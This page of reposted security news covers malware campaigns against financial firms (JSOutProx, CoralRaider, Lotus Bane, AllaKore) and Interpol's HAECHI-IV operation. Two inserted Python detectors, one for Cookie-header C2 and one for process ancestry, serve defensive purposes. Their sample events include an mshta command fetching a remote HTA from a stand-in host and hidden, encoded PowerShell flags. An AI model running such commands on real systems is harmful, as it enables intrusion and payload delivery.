Financial – INDIA NEWS (https://www.indiavpn.org)

New Wave of JSOutProx Malware Targeting Financial Firms in APAC and MENA
https://www.indiavpn.org/2024/04/05/new-wave-of-jsoutprox-malware-targeting-financial-firms-in-apac-and-mena/
Fri, 05 Apr 2024 08:54:38 +0000

Apr 05, 2024 | Newsroom | Cyber Espionage / Cybersecurity


Financial organizations in the Asia-Pacific (APAC) and Middle East and North Africa (MENA) are being targeted by a new version of an “evolving threat” called JSOutProx.

“JSOutProx is a sophisticated attack framework utilizing both JavaScript and .NET,” Resecurity said in a technical report published this week.

“It employs the .NET (de)serialization feature to interact with a core JavaScript module running on the victim’s machine. Once executed, the malware enables the framework to load various plugins, which conduct additional malicious activities on the target.”

First identified in December 2019 by Yoroi, early attacks distributing JSOutProx have been attributed to a threat actor tracked as Solar Spider, which has a track record of striking banks and other large companies in Asia and Europe.

In late 2021, Quick Heal Security Labs detailed attacks leveraging the remote access trojan (RAT) to single out employees of small finance banks from India. Other campaign waves have taken aim at Indian government establishments as far back as April 2020.


Attack chains are known to leverage spear-phishing emails bearing malicious JavaScript attachments masquerading as PDFs and ZIP archives containing rogue HTA files to deploy the heavily obfuscated implant.

“This malware has various plugins to perform various operations such as exfiltration of data, performing file system operations,” Quick Heal noted [PDF] at the time. “Apart from that, it also has various methods with offensive capabilities that perform various operations.”

The plugins allow it to harvest a wide range of information from the compromised host, control proxy settings, capture clipboard content, access Microsoft Outlook account details, and gather one-time passwords from Symantec VIP. A unique feature of the malware is its use of the Cookie header field for command-and-control (C2) communications.
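The Cookie-header channel described above is unusual enough to hunt for: a legitimate Cookie header is a list of short name=value pairs, while a beacon smuggled through it tends to be one long, nameless or base64-looking blob that decodes to structured text. The following heuristic is an added example written for this page, not code from Resecurity or from the malware analysis it summarises. The log format, the log lines, the host 10.1.1.9 and the two beacon payloads are all constructed for the example; the thresholds (24 and 40 characters, 4.5 bits/char entropy, 90% printable) are assumptions to be tuned against your own traffic.

```python
import base64
import binascii
import math
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample lines: Apache-style access log with the request Cookie header
# appended. These are invented for the example, not captures of real JSOutProx traffic.
# The two "beacon" values are built from plaintext here so the sample stays readable.
_BARE_BEACON = base64.b64encode(
    b"host=WIN10-FIN02;user=jsmith;os=Windows 10;av=none;task=poll").decode()
_NAMED_BEACON = base64.b64encode(
    b"win10-fin02|jsmith|bank-domain|1234567890").decode()

SAMPLE_LOG = "\n".join([
    '10.1.1.5 - - [08/Feb/2024:09:12:01 +0000] "GET /news/index.html HTTP/1.1" 200 5120 '
    'cookie="session=abc123; theme=dark; lang=en"',
    '10.1.1.5 - - [08/Feb/2024:09:12:07 +0000] "GET /api/v1/status HTTP/1.1" 200 300 '
    'cookie="PHPSESSID=e3b0c44298fc1c149afbf4c8996fb924"',
    '10.1.1.9 - - [08/Feb/2024:09:13:44 +0000] "GET /update HTTP/1.1" 200 120 '
    f'cookie="{_BARE_BEACON}"',
    '10.1.1.9 - - [08/Feb/2024:09:14:02 +0000] "GET /update HTTP/1.1" 200 120 '
    f'cookie="id={_NAMED_BEACON}"',
])

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+) cookie="(?P<cookie>[^"]*)"$')
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def split_cookie(header: str) -> List[Tuple[str, str]]:
    """Split a Cookie header into (name, value) pairs.

    A token with no '=' (or whose only '=' characters are trailing base64 padding)
    has no cookie name; it is returned with an empty name so it can be scored as bare.
    """
    pairs = []
    for part in header.split(";"):
        part = part.strip()
        if not part:
            continue
        m = re.match(r"^([^=]+)=(.*)$", part)
        if m and m.group(2) and not re.fullmatch(r"=*", m.group(2)):
            pairs.append((m.group(1), m.group(2)))
        else:
            pairs.append(("", part))
    return pairs


def shannon_entropy(s: str) -> float:
    """Bits per character; base64 blobs score well above short English-ish values."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def decode_b64_text(value: str) -> Optional[str]:
    """Return the decoded text if value is well-formed base64 of mostly printable bytes."""
    if len(value) % 4 or not B64_RE.match(value):
        return None
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    printable = sum(1 for b in raw if 32 <= b < 127 or b in (9, 10, 13))
    return raw.decode("latin-1") if raw and printable / len(raw) >= 0.9 else None


def cookie_reasons(name: str, value: str) -> List[str]:
    """Heuristic reasons a single cookie token looks like a C2 channel (assumed thresholds)."""
    reasons = []
    if name == "" and len(value) >= 24:
        reasons.append("bare token without a cookie name")
    if len(value) >= 40:
        if decode_b64_text(value) is not None:
            reasons.append("long base64 value that decodes to text")
        if shannon_entropy(value) >= 4.5:
            reasons.append("high-entropy value")
    return reasons


def analyze_log(text: str) -> List[Dict[str, object]]:
    """Parse log lines and return one hit per suspicious cookie token."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        for name, value in split_cookie(m.group("cookie")):
            reasons = cookie_reasons(name, value)
            if reasons:
                hits.append({"src": m.group("src"), "path": m.group("path"), "name": name,
                             "value": value, "decoded": decode_b64_text(value),
                             "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in analyze_log(SAMPLE_LOG):
        print(hit["src"], hit["path"], hit["reasons"], hit["decoded"])
```

Run it over a proxy or WAF export that preserves request headers; the two 10.1.1.9 lines are reported, the normal session cookies are not. Treat the output as a triage queue rather than an alert: some tracking cookies are also long and opaque, so the decoded text is included in each hit so an analyst can tell a host/user beacon from an advertising identifier at a glance.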

JSOutProx also stands out for being a fully functional RAT implemented in JavaScript.

“JavaScript simply does not offer as much flexibility as a PE file does,” Fortinet FortiGuard Labs said in a report released in December 2020, describing a campaign directed against governmental monetary and financial sectors in Asia.

“However, as JavaScript is used by many websites, it appears to most users as benign, as individuals with basic security knowledge are taught to avoid opening attachments that end in .exe. Also, because JavaScript code can be obfuscated, it easily bypasses antivirus detection, allowing it to filter through undetected.”

The latest set of attacks documented by Resecurity entails using fake SWIFT or MoneyGram payment notifications to trick email recipients into executing the malicious code. The activity is said to have witnessed a spike starting February 8, 2024.

The artifacts have been observed hosted on GitHub and GitLab repositories, which have since been blocked and taken down.

“Once the malicious code has been successfully delivered, the actor removes the repository and creates a new one,” the cybersecurity company said. “This tactic is likely related to how the actor manages multiple malicious payloads and differentiates targets.”


The exact origins of the e-crime group behind the malware are presently unknown, although the victimology of the attacks and the sophistication of the implant point to the group originating from China or being affiliated with it, Resecurity posited.

The development comes as cyber criminals are promoting on the dark web new software called GEOBOX that repurposes Raspberry Pi devices for conducting fraud and anonymization.

Offered for only $80 per month (or $700 for a lifetime license), the tool allows the operators to spoof GPS locations, emulate specific network and software settings, mimic settings of known Wi-Fi access points, as well as bypass anti-fraud filters.

Such tools could have serious security implications as they open the door to a broad spectrum of crimes like state-sponsored attacks, corporate espionage, dark web market operations, financial fraud, anonymous distribution of malware, and even access to geofenced content.

“The ease of access to GEOBOX raises significant concerns within the cybersecurity community about its potential for widespread adoption among various threat actors,” Resecurity said.

Vietnam-Based Hackers Steal Financial Data Across Asia with Malware
https://www.indiavpn.org/2024/04/04/vietnam-based-hackers-steal-financial-data-across-asia-with-malware/
Thu, 04 Apr 2024 17:04:53 +0000


A suspected Vietnamese-origin threat actor has been observed targeting victims in several Asian and Southeast Asian countries with malware designed to harvest valuable data since at least May 2023.

Cisco Talos is tracking the cluster under the name CoralRaider, describing it as financially motivated. Targets of the campaign include India, China, South Korea, Bangladesh, Pakistan, Indonesia, and Vietnam.

“This group focuses on stealing victims’ credentials, financial data, and social media accounts, including business and advertisement accounts,” security researchers Chetan Raghuprasad and Joey Chen said. “They use RotBot, a customized variant of Quasar RAT, and XClient stealer as payloads.”

Other commodity malware used by the group comprises a combination of remote access trojans and information stealers such as AsyncRAT, NetSupport RAT, and Rhadamanthys.


The targeting of business and advertisement accounts has been of particular focus for attackers operating out of Vietnam, with various stealer malware families like Ducktail, NodeStealer, and VietCredCare deployed to take control of the accounts for further monetization.

The modus operandi entails the use of Telegram to exfiltrate the stolen information from victim machines, which is then traded in underground markets to generate illicit revenues.

“CoralRaider operators are based in Vietnam, based on the actor messages in their Telegram C2 bot channels and language preference in naming their bots, PDB strings, and other Vietnamese words hard-coded in their payload binaries,” the researchers said.

Attack chains start with a Windows shortcut file (LNK), although there is currently no clear explanation as to how these files are distributed to the targets.


Should the LNK file be opened, an HTML application (HTA) file is downloaded and executed from an attacker-controlled download server, which, in turn, runs an embedded Visual Basic script.

The script, for its part, decrypts and sequentially executes three other PowerShell scripts that perform anti-VM and anti-analysis checks, bypass Windows User Account Control (UAC), disable Windows and application notifications, and download and run RotBot.

RotBot is configured to contact a Telegram bot and retrieve the XClient stealer malware and execute it in memory, ultimately facilitating the theft of cookies, credentials, and financial information from web browsers like Brave, Cốc Cốc, Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera; Discord and Telegram data; and screenshots.

XClient is also engineered to siphon data from victims’ Facebook, Instagram, TikTok and YouTube accounts, gathering details about the payment methods and permissions associated with their Facebook business and ads accounts.
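The chain above (LNK, then mshta.exe pulling a remote HTA, then PowerShell, then a dropped binary talking to a Telegram bot) is visible in endpoint telemetry as process ancestry plus one outbound connection, which is what a detection should key on rather than on any one file hash. The following is an added example for this page, not Cisco Talos code and not a description of RotBot's internals: it walks a handful of constructed Sysmon-style events (process create and network connect) and applies three rules. The PIDs, paths, the 198.51.100.20 download host, the update.exe name and the browser allowlist are assumptions made up for the example.

```python
import base64
from typing import Dict, List

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Processes that legitimately reach Telegram; anything else hitting api.telegram.org
# is worth a look. Assumed allowlist; extend it for your estate.
TELEGRAM_OK = {"telegram.exe", "chrome.exe", "msedge.exe", "firefox.exe",
               "brave.exe", "opera.exe", "browser.exe"}
PS_FLAGS = ("-enc", "-encodedcommand", "-w hidden", "-windowstyle hidden",
            "-ep bypass", "-executionpolicy bypass")

# Constructed Sysmon-style events (id 1 = process create, id 3 = network connect).
# Every PID, path and host below is invented for the example.
_ENC = base64.b64encode("Write-Host probe".encode("utf-16le")).decode()
EVENTS = [
    {"id": 1, "pid": 1200, "ppid": 800, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    {"id": 1, "pid": 4100, "ppid": 1200, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe http://198.51.100.20/t/update.hta"},
    {"id": 1, "pid": 4188, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": f"powershell.exe -w hidden -ep bypass -enc {_ENC}"},
    {"id": 1, "pid": 5200, "ppid": 1200,  # benign control: admin script from explorer
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"id": 1, "pid": 6020, "ppid": 4188,
     "image": r"C:\Users\jsmith\AppData\Roaming\update.exe", "cmd": "update.exe"},
    {"id": 3, "pid": 6020, "image": r"C:\Users\jsmith\AppData\Roaming\update.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},
    {"id": 1, "pid": 7300, "ppid": 1200,  # benign control: browser using Telegram Web
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "cmd": "chrome.exe"},
    {"id": 3, "pid": 7300, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def build_tree(events: List[dict]) -> Dict[int, dict]:
    """Index process-create events by PID so parents can be looked up."""
    return {e["pid"]: e for e in events if e["id"] == 1}


def ancestry(tree: Dict[int, dict], pid: int, limit: int = 32) -> List[str]:
    """Image names from the given process up to the root we know about (self first)."""
    chain = []
    cur = tree.get(pid)
    while cur is not None and len(chain) < limit:
        chain.append(basename(cur["image"]))
        cur = tree.get(cur["ppid"])
    return chain


def detect(events: List[dict]) -> List[Dict[str, object]]:
    """Apply three ancestry/network rules and return one hit per matching event."""
    tree = build_tree(events)
    hits = []
    for e in events:
        name = basename(e["image"])
        if e["id"] == 1:
            cmd = e["cmd"].lower()
            # Rule 1: mshta.exe fetching its HTA over HTTP is the remote-HTA stage.
            if name == "mshta.exe" and ("http://" in cmd or "https://" in cmd):
                hits.append({"pid": e["pid"], "image": name,
                             "reason": "mshta.exe launched with a remote HTA URL"})
            # Rule 2: PowerShell whose ancestry includes a script host, with evasion flags.
            if name in {"powershell.exe", "pwsh.exe"}:
                parents = ancestry(tree, e["ppid"])
                if SCRIPT_HOSTS & set(parents):
                    flags = [f for f in PS_FLAGS if f in cmd]
                    reason = f"PowerShell descended from script host {parents[0]}"
                    if flags:
                        reason += " with " + ", ".join(flags)
                    hits.append({"pid": e["pid"], "image": name, "reason": reason})
        elif e["id"] == 3:
            # Rule 3: a non-browser process talking to Telegram's API (bot-based C2).
            dest = e["dest_host"].lower()
            if (dest == "telegram.org" or dest.endswith(".telegram.org")) and name not in TELEGRAM_OK:
                chain = " > ".join(reversed(ancestry(tree, e["pid"])))
                hits.append({"pid": e["pid"], "image": name,
                             "reason": f"non-browser process contacting {dest}; ancestry {chain}"})
    return hits


if __name__ == "__main__":
    for hit in detect(EVENTS):
        print(hit["pid"], hit["image"], hit["reason"])
```

Rule 3 deliberately reports the full ancestry string: a connection to api.telegram.org from a binary under a user's AppData whose grandparents are powershell.exe and mshta.exe is the whole CoralRaider story in one line, whereas the same destination from chrome.exe is just someone using Telegram Web.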

“RotBot is a variant of the Quasar RAT client that the threat actor has customized and compiled for this campaign,” the researchers said. “[XClient] has extensive information-stealing capability through its plugin module and various modules for performing remote administrative tasks.”


The development comes as Bitdefender disclosed details of a malvertising campaign on Facebook that’s taking advantage of the buzz surrounding generative AI tools to push an assortment of information stealers like Rilide, Vidar, IceRAT, and a new entrant known as Nova Stealer.

The starting point of the attack is the threat actor taking over an existing Facebook account and modifying its appearance to mimic well-known AI tools from Google, OpenAI, and Midjourney, and expanding their reach by running sponsored ads on the platform.

One imposter page masquerading as Midjourney had 1.2 million followers before it was taken down on March 8, 2023. The threat actors managing the page were mainly from Vietnam, the U.S., Indonesia, the U.K., and Australia, among others.

“The malvertising campaigns have tremendous reach through Meta’s sponsored ad system and have actively been targeting European users from Germany, Poland, Italy, France, Belgium, Spain, the Netherlands, Romania, Sweden, and elsewhere,” the Romanian cybersecurity company said.

New APT Group ‘Lotus Bane’ Behind Recent Attacks on Vietnam’s Financial Entities
https://www.indiavpn.org/2024/03/06/new-apt-group-lotus-bane-behind-recent-attacks-on-vietnams-financial-entities/
Wed, 06 Mar 2024 16:25:50 +0000

Mar 06, 2024 | Newsroom | Cyber Attack / Malware

A financial entity in Vietnam was the target of a previously undocumented threat actor called Lotus Bane that was first detected in March 2023.

Singapore-headquartered Group-IB described the hacking outfit as an advanced persistent threat group that’s believed to have been active since at least 2022.

The exact specifics of the infection chain remain unknown as yet, but it involves the use of various malicious artifacts that serve as stepping stones for the next stage.

“The cybercriminals used methods such as DLL side-loading and data exchange via named pipes to run malicious executables and create remote scheduled tasks for lateral movement,” the company said.


Group-IB told The Hacker News that the techniques used by Lotus Bane overlap with that of OceanLotus, a Vietnam-aligned threat actor also known as APT32, Canvas Cyclone (formerly Bismuth), and Cobalt Kitty. This stems from the use of malware like PIPEDANCE for named pipes communication.

It’s worth noting that PIPEDANCE was first documented by Elastic Security Labs in February 2023 in connection with a cyber attack targeting an unnamed Vietnamese organization in late December 2022.

“This similarity suggests possible connections with or inspirations from OceanLotus, however, the different target industries make it likely that they are different,” Anastasia Tikhonova, head of Threat Intelligence for APAC at Group-IB, said.

“Lotus Bane is actively engaging in attacks primarily targeting the banking sector in the APAC region. Although the known attack was in Vietnam, the sophistication of their methods indicates the potential for broader geographical operations within APAC. The exact duration of their activity prior to this discovery is currently unclear, but ongoing investigations may shed more light on their history.”

The development comes as financial organizations across Asia-Pacific (APAC), Europe, Latin America (LATAM), and North America have been the target of several advanced persistent threat groups such as Blind Eagle and the Lazarus Group over the past year.

Another notable financially motivated threat group is UNC1945, which has been observed targeting ATM switch servers with the goal of infecting them with a custom malware called CAKETAP.


“This malware intercepts data transmitted from the ATM server to the [Hardware Security Module] server and checks it against a set of predefined conditions,” Group-IB said. “If these conditions are met, the data is altered before being sent out from the ATM server.”

UNC2891 and UNC1945 were previously detailed by Google-owned Mandiant in March 2022 as having deployed the CAKETAP rootkit on Oracle Solaris systems to intercept messages from an ATM switching network and perform unauthorized cash withdrawals at different banks using fraudulent cards.

“The presence and activities of both Lotus Bane and UNC1945 in the APAC region highlight the need for continued vigilance and robust cybersecurity measures,” Tikhonova said. “These groups, with their distinct tactics and targets, underline the complexity of protecting against financial cyber threats in today’s digital landscape.”

AllaKore RAT Malware Targeting Mexican Firms with Financial Fraud Tricks
https://www.indiavpn.org/2024/01/27/allakore-rat-malware-targeting-mexican-firms-with-financial-fraud-tricks/
Sat, 27 Jan 2024 08:03:03 +0000

Jan 27, 2024 | Newsroom | Malware / Software Update


Mexican financial institutions are in the crosshairs of a new spear-phishing campaign that delivers a modified version of an open-source remote access trojan called AllaKore RAT.

The BlackBerry Research and Intelligence Team attributed the activity to an unknown Latin American-based financially motivated threat actor. The campaign has been active since at least 2021.

“Lures use Mexican Social Security Institute (IMSS) naming schemas and links to legitimate, benign documents during the installation process,” the Canadian company said in an analysis published earlier this week.

“The AllaKore RAT payload is heavily modified to allow the threat actors to send stolen banking credentials and unique authentication information back to a command-and-control (C2) server for the purposes of financial fraud.”


The attacks appear to be designed to particularly single out large companies with gross revenues over $100 million. Targeted entities span retail, agriculture, public sector, manufacturing, transportation, commercial services, capital goods, and banking sectors.

The infection chain begins with a ZIP file that’s either distributed via phishing or a drive-by compromise, which contains an MSI installer file that drops a .NET downloader responsible for confirming the Mexican geolocation of the victim and retrieving the altered AllaKore RAT, a Delphi-based RAT first observed in 2015.

“AllaKore RAT, although somewhat basic, has the potent capability to keylog, screen capture, upload/download files, and even take remote control of the victim’s machine,” BlackBerry said.

The new functions added to the malware by the threat actor include support for commands related to banking fraud, targeting Mexican banks and crypto trading platforms, launching a reverse shell, extracting clipboard content, and fetching and executing additional payloads.

The threat actor’s links to Latin America are inferred from the use of Mexican Starlink IP addresses in the campaign, as well as the addition of Spanish-language instructions to the modified RAT payload. Furthermore, the lures only work for companies that are large enough to report directly to the Mexican Social Security Institute (IMSS).


“This threat actor has been persistently targeting Mexican entities for the purposes of financial gain,” the company said. “This activity has continued for over two years, and shows no signs of stopping.”

The findings come as IOActive said it identified three vulnerabilities in the Lamassu Douro bitcoin ATMs (CVE-2024-0175, CVE-2024-0176, and CVE-2024-0177) that could allow an attacker with physical access to take full control of the devices and steal user assets.

The attacks are made possible by exploiting the ATM’s software update mechanism and the device’s ability to read QR codes to supply their own malicious file and trigger the execution of arbitrary code. The issues were fixed by the Swiss company in October 2023.

3,500 Arrested in Global Operation HAECHI-IV Targeting Financial Criminals
https://www.indiavpn.org/2023/12/24/3500-arrested-in-global-operation-haechi-iv-targeting-financial-criminals/
Sun, 24 Dec 2023 13:03:42 +0000

Dec 20, 2023 | Newsroom | Financial Crime / Cyber Threat


A six-month-long international police operation codenamed HAECHI-IV has resulted in the arrests of nearly 3,500 individuals and seizures worth $300 million across 34 countries.

The exercise, which took place from July through December 2023, took aim at various types of financial crimes such as voice phishing, romance scams, online sextortion, investment fraud, money laundering associated with illegal online gambling, business email compromise fraud, and e-commerce fraud.

In addition, authorities froze associated bank and virtual asset service provider (VASP) accounts in an effort to shut off access to criminal proceeds. In total, authorities blocked 82,112 suspicious bank accounts, confiscating $199 million in hard currency and $101 million in virtual assets.

“Cooperation between Filipino and Korean authorities led to the arrest in Manila of a high-profile online gambling criminal after a two-year manhunt by Korea’s National Police Agency,” Interpol, an international police organization, said.


Investment fraud, business email compromise, and e-commerce fraud accounted for 75% of the cases, the agency added, stating it detected a new scam in South Korea that involved the sale of non-fungible tokens (NFTs) with promises of huge returns, only for the operators to stage a rug pull and abruptly abandon the project.

Another novel trend concerned the use of artificial intelligence (AI) and deepfake technology to elevate the authenticity of scams, enabling criminals to impersonate people known to the targets, as well as deceive, defraud, harass, and extort victims through impersonation scams, online sexual blackmail, and investment fraud.

HAECHI-IV comes more than a year after HAECHI-III, which led to the seizure of $130 million worth of virtual assets in connection with a global crackdown on cyber-enabled financial crimes and money laundering.

“The seizure of $300 million represents a staggering sum and clearly illustrates the incentive behind today’s explosive growth of transnational organized crime,” Interpol’s Stephen Kavanagh said. “This vast accumulation of unlawful wealth is a serious threat to global security and weakens the economic stability of nations worldwide.”
